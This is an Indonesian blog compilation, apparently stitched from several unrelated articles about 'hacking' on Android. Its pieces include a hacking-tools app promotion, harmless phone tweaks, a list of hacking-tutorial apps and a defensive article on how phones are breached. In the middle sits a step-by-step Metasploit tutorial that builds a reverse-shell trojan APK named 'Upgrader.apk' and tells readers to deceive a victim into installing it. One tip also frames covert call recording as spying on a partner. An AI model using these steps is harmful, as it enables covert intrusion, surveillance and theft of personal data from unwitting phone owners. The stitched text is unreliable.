Belajar Hack Di Android Lengkap

Belajar Hack Di Android Lengkap Terbaru

Salah satu ilmu komputer yang paling populer adalah ilmu hacking. Umumnya ilmu ini mempelajari bagaimana cara menembus keamanan sistem komputer. Apakah kamu juga ingin mempelajari ilmu hacking? Apabila kamu ingin belajar jadi hacker, ternyata nggak sulit. Melalui cara dari Jaka ini, kamu bisa belajar sendiri lewat smartphone Android loh. Yuk, simak selengkapnya ulasan Jaka!

Belajar Jadi Hacker Lewat Android
Ilmu hacking bisa kamu pelajari lewat banyak hal, contohnya seperti buku. Namun kalau seandainya kamu belajar lewat buku, tampaknya kamu akan butuh rak buku yang sangat luas, pasalnya ilmu hacking sendiri memang sangat luas.
Sebelum pusing dan merasa mempelajari ilmu hacking itu merepotkan, ternyata kamu bisa pakai aplikasi android bernama SpyBoy loh. Aplikasinya kecil, tapi kamu bisa mempelajari ilmu hacking dengan lengkap. Kok bisa ya, bagaimana caranya?

Kategori Ilmu Hacking Super Lengkap!

Aplikasi SpyBoy ini ternyata adalah merupakan kumpulan tutorial untuk belajar jadi hacker yang sangat lengkap, Jaka berani katakan semua tutorial yang kamu butuh ada di sini. Mulai dari yang sangat dasar, hingga ilmu yang sangat tinggi.

Pada awal-awal, kamu bisa mulai dengan mempelajari dasar ilmu hacking. Lalu merambah dengan mengenal bagaimana kerja jaringan komputer. Lalu baru kamu mempelajari bagaimana sistem operasi dan membuat virus. Semuga dijabarkan secara lengkap banget!

Download Tools Hacking Super Lengkap!

Selain menyajikan tutorial yang lengkap, nggak ketinggalan juga ada beragam tools hacking yang lengkap. Bagi kamu yang sedang belajar jadi hacker, tentu jadi sangat dimudahkan. Nggak perlu lagi repot-repot cari tools hacking di internet.

Tersedia mulai dari software ringan seperti keylogger, hash decryptor, hack WiFi, dan masih banyak lagi. Secara garis besar, software yang kamu butuhkan untuk mengikuti tutorial semuanya ada di sini. Terdapat pula petunjuk cara memakai software.

Nggak Ngerti? Langsung Aja Tanya Via Chat!

Mempelajari ilmu hacking sendirian, Jaka akui agak susah. Dikarenakan tutorial kadang sulit untuk dimengerti. Tapi jangan khawatir, karena aplikasi ini juga menyediakan fitur chat ke para master hacker. Kalau nggak tahu, kamu langsung chat aja!

Selain chatting untuk bertanya, kamu juga bisa pakai untuk diskusi. Kalau menemukan hal baru, kamu juga bisa share ke para teman hacker lainnya. Asyik bukan kalau lewat aplikasi ini? Kamu jadi nggak perlu belajar sendirian.

Banyak orang yang mengira harus me-rooting Androidnya untuk bisa mengoprek smartphone mereka. Tapi root bukan hanya membawa kelebihan. Banyak juga kekurangan yang akan kamu dapatkan setelah kamu me-root Androidmu, misalnya saja garansi resminya tidak berjalan lagi dan bisa gagal root juga. Namun ternyata ada beberapa cara keren yang tampak seperti hack Android kamu tanpa harus me-root device kamu. Berikut kumpulan trik hackinguntuk Android yang belum di-root:

Kumpulan Trik Hacking untuk Android yang Belum di-Root.

1. Merekam Percakapan Telepon
Kamu pasti sering nonton film action yang memperlihatkan seseorang menyadap pembicaraan di telepon seseorang kan? Kalau kamu kira itu membutuhkan teknologi tinggi, kamu salah sangka. Cara ini sudah JalanTikus beritahukan tutorial-nya di artikel terdahulu yang berjudul Rekam Diam-diam Percakapan Pacar Kamu dengan Aplikasi Ini .

Dengan Automatic Call Recorder kamu bisa merekam percakapan pada panggilan masuk dan menyimpannya. Aplikasi ini gratis dan mudah digunakan serta tidak memerlukan akses root ke perangkat kamu. Download aplikasinya di sini: 

2. Install Linux di Hp Android Kamu
Memindahkan sistem operasi desktop seperti Linux ke hp Android kamu mungkin terdengar hacking skill tingkat tinggi, ya? Tapi sebenarnya ini nggak seperti yang kamu pikirkan. Hal ini menjadi simpel karena ada aplikasi bernama Debian norootyang kamu bisa download di JalanTikus. Aplikasi ini sudah pasti gratis. Untuk menggunakannya, pertama buka dari Homescreen Android kamu dulu seperti aplikasi lainnya.

Saat kamu membuka aplikasi itu, kamu bisa men-download dan menginstal program atau games untuk Debian sama seperti versi Linux lainnya. Download sendiri untukmu dan buat teman-temanmu kagum pada hp Androidmu. 

3. Pakai LED Flash Sebagai Monitor Detak Jantung
Kamu sih nggak perlu root perangkat kamu kalau perangkat kamu memang sudah dilengkapi dengan heart-rate monitormisalnya Samsung Galaxy S5. Tapi kalau hp Android kamu masih di bawah itu spesifikasinya, kayanya kamu perlu sedikit hack untuk hp kamu supaya bisa dijadikan monitor detak jantung deh. Teknologi di belakang heart rate monitor di perangkat Android cukup efektif hanya dengan lampu yang mencari perubahan warna di bawah kulitmu untuk memonitor jumlah darah yang lewat. Dengan software yang tepat, LED Flash di hp kamu bisa kamu jadikan alat untuk memonitor detak jantung kamu loh. Software yang tepat untuk melengkapi itu adalah Instant Heart Rate Monitor.

4. Aktifkan Edge Display di perangkat Android Kamu
Edge display di Samsung Galaxy S6 Edge merupakan salah satu yang terkeren di smartphone masa kini. Kalau hp kamu belum ada fitur Edge display, kamu bisa sedikit hack hp Android kamu pake aplikasi Edge Color Notifications. Dengan menggunakan aplikasi ini, kamu bisa mendapatkan sidebar notification ketika kamu menerima telepon. Jangan iri dulu sama Galaxy S6 Edge, buat hp Androidmu rasa S6 Edge dengan aplikasi Edge Color Notification.

5. Buat Tombol Navigasimu Menjadi Shortcut
Aplikasi Home2 Shortcut memang sudah lama namun sangat berguna hingga saat ini. Kamu bisa membuat berbagai macam shortcut untuk tombol navigasi kamu dengan aplikasi ini. Home2 Shortcut juga memperbolehkan kamu mengakses aplikasi favoritmu secara instan dari mana saja. Rasakan sendiri keseruan mengoprek hp Androidmu dengan aplikasi ini tanpa mengharuskan kamu root device terlebih dahulu.

6. Mengkostumisasi Widget
Widget memang salah satu fitur di Android yang boros baterai. Namun selain boros baterai, widget memiliki kegunaannya sendiri yaitu sebagai shortcut sebuah aplikasi atau games yang bisa kamu tampilkan di home screen Android-mu.
Mungkin kamu mengira tampilan layar kamu akan jelek dan kepenuhan karena widget, namun kamu bisa coba berkreasi dengan memperkecil atau memperbesar ukuran widget dan menaruhnya sesuai selera kamu. Dengan begitu kamu bisa memiliki layar dengan berbagai shortcutdan memudahkan kamu untuk meraih suatu aplikasi. Kamu bisa mengatur shortcut sehingga kamu nggak perlu masuk ke menu yang sama berulang kali.

7. Remote Desktop dengan Hp Android
Aplikasi Chrome Remote Desktop bisa membuat Android-mu untuk mengontrol PC-mu dari mana saja dengan mudah. Kamu nggak perlu menginstal softwareyang berat dan pengaturan yang rumit, jadi kamu bisa beralih ke hal lain hanya dalam waktu kurang dari sepuluh menit. Untuk mengaktifkannya kamu harus memasang ekstension di Google Chrome kamu dengan download di Chrome Extensions.
Untuk mengatur Chrome Remote Desktop, pada tiap komputer atur remote akses menggunakan aplikasi Chrome Remote Desktop dari Chrome Web Store. Lalu pada perangkat Android kamu, buka aplikasi dan tap pada komputer kamu yang online untuk menghubungkannya. Dan Ka-boom, sekarang kamu bisa mengontrol PC menggunakan Android dari mana saja. Keren ya!! Untuk lebih jelasnya kamu bisa baca Akses Komputer Kamu Melalui Android dengan Chrome Remote Desktop.

8. Rekam Aktifitas di Layar Android
Kalau dulu, merekam video dari layar Android adalah sesuatu merepotkan, namun saat ini Android 5.0 Lollipop menambahkan kemampuan API untuk merekam layar sehingga para developermampu menciptakan aplikasi perekaman layar yang jauh lebih stabil.
Contohnya AZ Screen Recorder, AZ Screen Recorder adalah aplikasi terbaik untuk merekam layar di Android kamu. Aplikasi ini tidak memerlukan akses root, tidak berbatas waktu, tidak ada watermark, ad free, dan sangat mudah digunakan. adalah aplikasi terbaik untuk merekam layar di Android kamu. Aplikasi ini tidak memerlukan akses root, tidak berbatas waktu, tidak ada watermark, ad free, dan sangat mudah digunakan.

9. Main Game Nintendo Pakai Emulator
Kamu punya game kesayangan yang dulu sering dimainin di Nintendo? Jangan khawatir nggak bisa mainin game itu meskipun Nintendo kamu rusak. Kamu bisa mainkan game N64 di Android pakai emulator kok. Emulator ini tidak perlu akses root untuk menjalankannya. Download MegaN64 (N64 Emulator) di JalanTikus sekarang juga.

10. Baca Kabar Berita Terbaru Hanya dari Lockscreen
Locket adalah aplikasi intelligent lock screenalias lock screen yang pandai serta bisa membawa kamu untuk selalu up-to-date akan hal-hal yang terjadi dari saat kamu baru bangun hingga pergi tidur. Aplikasi ini mempelajari kesukaan dan kebiasaanmu untuk membawamu kepada konten yang relevan di lock screen hp. Semakin sering kamu menggunakan aplikasi Locket Lock Screen, maka aplikasi ini pun semakin mengenalmu dan menjadikannya mudah digunakan. Locket Lock Screen terpilih menjadi "Best Apps of 2014" oleh Google. Dapatkan kabar terbaru hanya dari layar smartphone kamu dengan Locket Lock Screen.

Seperti kamu tahu, banyak kasus hackermenghebohkan terjadi di dunia. Selain karena memang banyak orang lebih nyaman menyimpan informasi dan data pribadi dalam format digital, banyaknya hacker ini juga didukung oleh kemudahaan teknologi.

Karena teknologi semakin canggih, banyak orang dengan mudah bisa menjadi hacker. Bahkan, kamu bisa berasa jadi hackerhandal jika menginstall aplikasi hacker yang disediakan lhohai sobat ku, ada yang bertanya kepada saya katanya " saya ingin belajar menjadi hacker tapi saya tidak memiliki pc/laptop hanya dari warnet saya menggunkan pc " postingan ini akan mempermudah kalian yang ingin belajar menjadi seorang hacker tapi terhambat karena tidak ada pc/laptop, buat yang mempunyai komputer atau laptop postingan ini juga penting buat kita yang mempunyai pc/laptop..

Mengapa? (mungkin kalian bertanya seperti itu ke saya)
jadi langsung saya jelaskan ya..

80% dari pengguna di internet berasal dari ponsel ,dan rata-rata waktu kita juga paling sering menggunakan ponsel gak mungkin kan sepanjang hari kalian  24 jam depan komputer atau laptop, makanya postingan saya ini saya berikan untuk kita tetap bisa belajar dunia hacking selama tidak di depan pc/laptop dan kalau mau memperaktekan nya pas lagi di pc/laptop, dan aplikasi ini update tentang hacking dunia terbaru. Berikut adalah beberapa aplikasi gratis terbaik untuk mendapatkan beberapa pengetahuan tentang hacking.

Jika Anda seorang pemula yang ingin mendapatkan pijakan di demistifikasi dunia hacking, ini hack aplikasi tutorial adalah cara terbaik bagi Anda karena menawarkan materi termasuk cara termudah untuk melakukan hacking dan memungkinkan perlindungan perangkat Anda.
Hacking Tutorial. Ini adalah salah satu yang paling informatif Android tutorial hacking yang menjelaskan hampir semua teknik hacking dan aplikasi praktis; meskipun tujuan utama dari pencipta aplikasi ini adalah pendidikan dan perlindungan
Sebuah aplikasi yang mengagumkan yang menawarkan pengetahuan teoritis dan praktis yang luas mengenai hacking komputer. Tidak hanya itu memungkinkan perluasan pengetahuan, tetapi juga membantu dengan mendiagnosis setiap masalah komputer.

Computer Tricks Guide
Meningkatkan kehidupan teknis Anda dengan tips cerdas dan keren dan hacking trik. Pelajari trik baru secara teratur dan memukau teman-teman Anda.
Hack Hackers
Ini adalah tutorial yang luar biasa yang menawarkan pengetahuan yang luas mengenai teknik seperti mengamankan pen drive, alamat WiFi atau Wireless router hacking. 

Become Hacker
Untuk menjadi seorang hacker etis, Anda perlu memahami trik black hat hacker. Ini adalah di antara yang terbaik aplikasi hack tutorial untuk memanfaatkan metode topi hitam.
Hacking Knowledge
Ini adalah fakta bahwa hacking komputer manapun membutuhkan pengetahuan yang komprehensif dari beberapa topik. Belajar hacking komputer tidak hanya menawarkan jalur karier baru, tetapi juga memungkinkan pengguna untuk mendiagnosa dan masalah komputer yang benar, baik yang disediakan oleh aplikasi ini.

Hacking+
Gunakan aplikasi ini untuk belajar hack aplikasi android, dan mendapatkan informasi yang komprehensif mengenai phishing, footprinting, virus file batch, dan cacing.

Hackers Reference
Sebuah titik acuan yang sangat baik untuk pro dan pemula, aplikasi ini menawarkan hal informasi mengenai dan penggunaannya dalam alam semesta hacker seperti bot.net, perbedaan antara hex dan binary.

WhiteHat Hacking Tutorials
Upaya berbasis komunitas, tutorial hack ini mencakup berbagai tips dan teknik yang dapat digunakan untuk menjadi seorang profesional keamanan dan mencakup berbagai macam topik seperti hacking dasar-dasar teknik manajemen keamanan.

Hackers HandBook
Ini adalah salah satu yang terbaik tutorial hacking yang android dengan teknik partisipasi aktif yang memungkinkan Anda untuk menguasai keahlian hacking dengan mudah. Cara terbaik adalah untuk pemula yang ingin belajar teknik hacking canggih.

itulah aplikasi-aplikasi untuk belajar dunia hacking dengan ponsel yang anda miliki, kalau saya paling saya sering buka Become Hacker karena tutorial yang mereka berikan termasuk dalam kategori dunia hitam, saya suka itu hehehe..
jadi sekarang jangan kecewa ya sobat-sobat ku yang tidak ada laptop/pc
pelajari dulu dari ponsel kalian baru kalian praktekan di mana yang kalian inginkan ..

siapapun bisa belajar dunia hacking ... 
kita saudara ..
kita adalah pasukan di mana tidak mengenal usia,jabatan,harta maupun agama.
kita berkumpul karena rasa ingin tau kita dengan dunia internet dan security network.

saya juga orang tak punya apa-apa tapi saya orang yang berambisi tinggi .
semua hacker pro di luar sampai saya email semua akun mereka untuk menggali informasi tentang hacking.
apabila kita niat pasti ada jalan nya sobat ..
oke sudah malam saya mau ketik bahan postingan yang lain ..
mumpung ada info dari email saya .. hahahahhaha..
*saran ni buat kalian,jangan di indonesia aja cari ilmu dunia ini luas alat komunikasi juga banyak*

Cara Mudah Hack (Exploit) Perangkat Android Apa Saja

Semakin banyak pengguna Android, semakin banyak juga hacker yang berusaha meng-exploit Android baik itu sekedar iseng atau mencuri data pribadi pengguna
Pada tutorial kali ini, kita akan belajar bagaimana cara nge-hack device Android apa saja dengan bantuan Kali Linux. Berikut ini langkah demi langkahnya:

Langkah 1:
Buka terminal, dan buatlah Trojan.apk
Caranya dengan mengetik kode ini:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk
(ganti LHOST dengan IP kamu)


Langkah 2:
Buka terminal baru sambil menunggu file selesai dibuat.
Kemudian load metasploit console dengan mengetikkan msfconsole


Langkah 3:
Setelah berhasil loading (tunggu aja), load multi-handler exploit dengan mengetikkan:
use exploit/multi/handler
Buatlah sebuah (reverse) payload dengan mengetikkan:
set payload android/meterpreter/reverse_tcp
Cara nge-set Lhost ketikkan:
set LHOST 192.168.0.4
(Walaupun kamu lagi ngehack dalam jaringan WAN, ketikkan IP private/internal ya bukan yang public/external)


Langkah 4:
Ketikkan exploit untuk menjalankan listener.
Copy aplikasi yang telah kamu buat (Upgrader.apk) dari folder root ke smartphone Android kamu.
Kirim apk nya ke device target dan biarkan target menginstall app Upgrader (disini kamu bisa pake tipu muslihat kalau guna app ini adalah untuk update beberapa fitur pada smartphone-nya).
Ketika target ngeklik Open, exploit akan berjalan dan kamu akan mulai bisa mengakses Androidnya.
Bagaimanapun, opsi “Installation of apps from unknown sources” harus di-enabled di smartphone target. Kalau belum, pergilah ke Security settings untuk mengaktifkannya sehingga Trojan bisa terinstall.
Target harus menginstall/membuka app Trojan dulu, baru kita bisa mulai ngehack Android-nya target.
Yak itu tadi langkah-langkahnya. Gampang ya, paling. lol. Selamat mencoba deh.

Kian hari smartphone menjadi sesuatu yang wajib bagi banyak orang, bahkan bisa dikatakan menjadi barang pribadi yang harus ada di manapun seseorang itu berada. Smartphone juga semakin canggih dengan spesifikasi yang semakin tinggi lagi, dengan harga yang sangat bervariasi. Begitu juga dalam hal teknologi keamanan, semua produsen #smartphoneterus mengembangkan keamanan tertinggi untuk menghindari privasi para konsumen mereka dicuri oleh pihak yang tidak bertanggung jawab, yaitu hacker.
Hacker tidak henti-hentinya menyerang segala jenis smartphone, termasuk #Android. Banyak sekali cara yang dilakukan oleh para hacker untuk menyerang para pemilik smartphone Android dengan tujuan untuk mencuri data, untuk merusak sistem, dan lainnya. Berikut ini saya jabarkan beberapa kasus di mana para hacker berhasil meretas smartphone Android. Berikut ini cara hacker membobol smartphone Android.

1. Melalui Aplikasi Chatting
Sangat menakutkan sekali mengingat ternyata aplikasi chatting bisa diretas oleh para hacker. Saya sendiri juga pernah tiba-tiba diajak chat oleh orang asing namanya aneh dan tidak ada fotonya, yang statusnya offline tapi bisa chat dengan saya. Saya mendapat kasus ini dari aplikasi Skype.
Cara hacker ini meretas melalui penambahan kontak baru, melalui pesan, melalui panggilan tidak diketahui, atau mengirim URL video. Lalu, dari sana si hacker akan mendapatkan informasi celah smartphone Android. Beberapa aplikasi yang berhasil diretas hacker antara lain Skype, Hang Out, BBM, Whatsapp, Line. Berbahaya sekali bila berbicara melalui aplikasi chat dengan orang yang tak dikenal karena sekarang ini hacker semakin pintar mencari celah keamanan. Berhati-hatilah kawan.
Solusinya, sebaiknya langsung dihapus atau block jika seseorang yang tidak dikenal menambahkan/ add kita sebagai teman. Jangan merespon pesan atau panggilan dari mereka, dan jangan membuka link URL yang mereka berikan.
Artikel lain: Cara Memblokir Nomor Telepon di Android (Panggilan dan SMS)

2. Melalui SMS dan MMS
Cara yang kedua adalah melalui MMS dan SMS. Hacker bisa meretas smartphone Android melalui SMS dan MMS yang otomatis masuk ke dalam inbox/ kotak masuk. Ini bukan pesan biasa, melainkan pesan yang berisi code khusus yang telah disisipkan oleh para hacker.
Dan hacker akan mendapat info keamanan smartphone Android jika,
Kita membalas pesan tersebut. Secara otomatis merambah smartphone Android ketika pesan SMS tersebut diterima. Dan jika kita membalas pesan tersebut, maka hacker akan mendapat data smartphone kita.
Kita menekan link dan menuju URL yang ada di pesan SMS atau MMS. Dan URL itu akan mengarahkan kita pada sebuah website jebakan, yang mana disana informasi kita dikumpulkan.

Jika kita membuka gambar atau audio atau video singkat yang ada pada pesan MMS. Saat kita membuka semua media tersebut, maka code akan bekerja merambah seluruh smartphone Android kita. Dan code ini akan dikirim kepada hacker secara otomatis ketika kita terhubung ke internet.
Kita tidak akan tahu bahwa data kita dari smartphone sudah dicuri oleh para hacker, seperti tidak ada masalah sama sekali. Solusinya, jangan pernah merespon SMS dan MMS yang masuk dari nomor tidak dikenal atau tanpa nomor. Apalagi untuk pesan MMS yang berisi URL (alamat web), atau berisi media seperti gambar, atau audio, atau #video.

3. Melalui Certifi-Gate
Hacker juga bisa menyerang smartphone Android melalui celah pada Certifi-Gate. Implementasi mobile Remote Support Tool, yang mana tertanam pada Sistem Operasi Android yang dipasang oleh setiap pabrikan smartphone Android, inilah yang disebut oleh para hacker sebagai Certifi-Gate. Banyak sekali celah pada Certifi-Gate untuk masuk dan meretas.
Dengan adanya Certifi-Gate pada smartphone Android, memungkinkan plugin pihak ketiga untuk menduplikasi layar perangkat dan melakukan tindakan ke perangkat menggunakan certificate dari OEM (produsen/pabrik dari perangkat Android).

Bila berhasil dieskploitasi, Certifi-Gate memungkinkan aplikasi jahat akan mendapat akses tak terbatas pada perangkat kita tanpa kita sadari, bahkan bisa memungkinkan untuk mengakses data user dan melakukan tindakan yang harusnya hanya bisa dilakukan oleh pemilik smartphone.
Solusinya, sebaiknya download aplikasi terpercaya saja yaitu Playstore dan tidak sembarangan menginstall aplikasi, terutama yang bukan terdapat di Google Play Store maupun di luar toko aplikasi lain.

4. Melalui Kunci Sidik Jari
Selain itu, hacker juga bisa menyerang kunci sidik jari pada smartphone Android. Aplikasi kunci sidik jari baik yang aplikasi bawaan/ bloatware, maupun aplikasi yang kita instal dari Google Play atau tempat lain, sejatinya mudah sekali untuk dicuri datanya.
Para hacker ini masuk ke dalam smartphone kita melalui internet, lalu menyisipkan code untuk mencuri data dari kunci sidik jari. Jika sudah mendapat informasi ini, maka secara otomatis aplikasi akan melakukan hal-hal yang tidak kita lakukan, seperti tiba-tiba smartphone kita mengirim pesan sendiri, membuka browser sendiri, dan lainnya. Kode tersebut telah mendapatkan data dari smartphone kita, dan kode tersebut mengirim data kita melalui SMS atau MMS ataupun via internet.
Untuk masalah ini belum ada solusinya. Mungkin saran saya, berhati-hati ketika browsing di internet, hati – hati terhadap iklan dan aplikasi yang tiba-tiba minta diunduh. Tidak seperti milik iPhone, yang mana memiliki Touch ID, yang mana sulit sekali ditembus oleh para hacker.
Baca juga: Marshmallow, Akhirnya Menjadi Nama Resmi Sistem Operasi Android M

5. Melalui Aplikasi Baterai
Yang ini lebih unik lagi. Hacker bisa mencuri data pada smartphone kita melalui aplikasi baterai. Baik aplikasi baterai bawaan smartphone maupun aplikasi baterai hasil instalasi. Bagaimana cara hacker mencuri data kita.
Sejatinya, aplikasi baterai atau power saver itu meneliti semua data pada smartphone kita, mulai dari aplikasi yang berjalan, cookies, cache, dan lainnya. Nah, dari situ aplikasi power saver bisa dengan cermat menghemat baterai agar tidak cepat habis.
Nah, dari situlah para hacker masuk. Mereka membobol aplikasi baterai ini, dan menanamkan kodenya. Nah, darisini maka kode tersebut akan mengumpulkan sebanyak-banyaknya informasi dari smartphone kita. Dan akan dikirim ke hacker pada saat kita tersambung ke #internet, atau melalui “update versi terbaru”. Kita tidak akan tahu bahwa hacker telah mencuri data kita.
Solusinya, jangan pernah memakai aplikasi baterai dari pihak ketiga atau meng-instal aplikasi baterai. Jika merupakan aplikasi bawaan, sebaiknya di non-aktifkan.

Nah, demikianlah beberapa kasus yang pernah terjadi berkaitan dengan pencurian data atau perusakan smartphone Android kita oleh para hacker. Berhati-hatilah, mengingat smartphone Android merupakan platform paling banyak dipakai di seluruh dunia. Terima kasih telah membaca, dan semoga bermanfaat.

Anda mungkin menyukai postingan ini